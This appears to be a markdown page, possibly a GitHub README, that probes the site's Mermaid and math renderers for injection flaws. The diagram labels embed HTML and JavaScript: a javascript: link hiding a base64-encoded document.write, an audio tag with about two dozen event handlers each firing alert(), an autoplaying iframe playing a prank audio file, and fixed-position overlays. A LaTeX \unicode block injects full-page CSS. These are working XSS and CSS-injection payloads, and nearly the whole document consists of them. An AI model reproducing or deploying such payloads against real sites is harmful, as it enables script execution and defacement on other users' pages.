<img src='https://i.pinimg.com/originals/9b/bb/28/9bbb28fecad2a29b4ebdc1ddbecbb6e6.gif' style="position: fixed" />

```mermaid
pie title NETFLIX
         "Time spent looking for movie" : 90
         "Time spent watching it" : 10
```

```mermaid
graph TD
    A[Christmas] -->|Get money| B(Go shopping)
    B --> C{Let me think}
    C -->|One| D[<iframe src='https://github.com/whytrall-testing/whats-new-test-page/raw/main/rr.mp3' allow='autoplay' id='audio'></iframe>]
    C -->|Two| E[iPhone]
    C -->|Three| F[fa:fa-car Car]
```

```mermaid   
graph TD  
    A[Test] --> L["<a href='javascript#colon;document.write(atob`PGEgaHJlZj0jIG9uY2xpY2s9Ino9d2luZG93Lm9wZW4oJ2h0dHBzOi8vbG9jYWxob3N0Jyk7Ij5DTElDSyBNZQ==`)'>CLICK</a>"]   
```  


```mermaid
graph TD
    B --> C("<img src='https://i.pinimg.com/originals/9b/bb/28/9bbb28fecad2a29b4ebdc1ddbecbb6e6.gif' />")
    C -->|One| D["<audio autoplay controls onabort='alert(1)' oncanplay='alert(2)' oncanplaythrough='alert(3)' oncuechange='alert(4)' ondurationchange='alert(5)' onemptied='alert(6)' onended='alert(7)' onerror='alert(8)' onloadeddata='alert(9)' onloadedmetadata='alert(10)' onloadstart='alert(11)' onpause='alert(12)' onplay='alert(13)' onplaying='alert(14)' onprogress='alert(15)' onratechange='alert(16)' onseeked='alert(17)' onseeking='alert(18)' onstalled='alert(19)' onsuspend='alert(20)' ontimeupdate='alert(21)' onvolumechange='alert(22)' onwaiting='alert(23)'><source src='https://github.com/whytrall-testing/whats-new-test-page/raw/main/rr.mp3'>kekw</audio>"]
```

```math
\ce{$&#x5C;unicode[goombafont; color:red; pointer-events: none; z-index: -10; position: fixed; top: 0; left: 0; height: 100vh; object-fit: cover; background-size: cover; width: 130vw; opacity: 0.66; background: url('https://raw.githubusercontent.com/younesbram/younesbram/main/matrix.gif');]{x0000}$}